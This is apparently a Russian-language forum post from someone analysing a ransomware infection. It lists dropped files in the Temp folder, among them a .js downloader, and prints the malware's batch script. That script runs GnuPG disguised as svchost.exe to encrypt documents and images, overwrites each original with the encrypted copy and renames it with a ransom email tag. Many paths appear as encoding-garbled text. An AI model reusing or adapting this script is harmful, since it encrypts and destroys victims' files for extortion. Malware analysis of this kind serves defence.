Вот само зло наверно:
C:\Documents and Settings\%USERNAME%\Local Settings\Temp\
j13544q130b.js (рандомный, скачивает с интернета исходники вируса, через прокси тунель)
C:\Documents and Settings\%USERNAME%\Local Settings\Temp\
keyb.cmdC:\Documents and Settings\%USERNAME%\Local Settings\Temp\
bitdata.cmdСкрытый текст |
---|
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Default User\ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Default User\ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Default User\ Ў«®л\excel.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Default User\ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Default User\ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Default User\ Ў«®л\excel4.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Default User\ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Default User\ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Default User\ Ў«®л\winword.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Default User\ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Default User\ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Default User\ Ў«®л\winword2.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Virlab\ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Virlab\ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Virlab\ Ў«®л\excel.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Virlab\ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Virlab\ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Virlab\ Ў«®л\excel4.xls" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Virlab\ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Virlab\ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Virlab\ Ў«®л\winword.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Virlab\ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Virlab\ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Virlab\ Ў«®л\winword2.doc" "[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" "‚®¤плҐ «Ё«ЁЁ[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" "ѓ®«гЎлҐ е®«¬л[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" "‡ Є в[email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" "‡Ё¬ [email protected]_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & move /y "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip.gpg" "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & rename "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" "‘Є -Є®ЇЁЁ бзҐв®ў[email protected]_com" |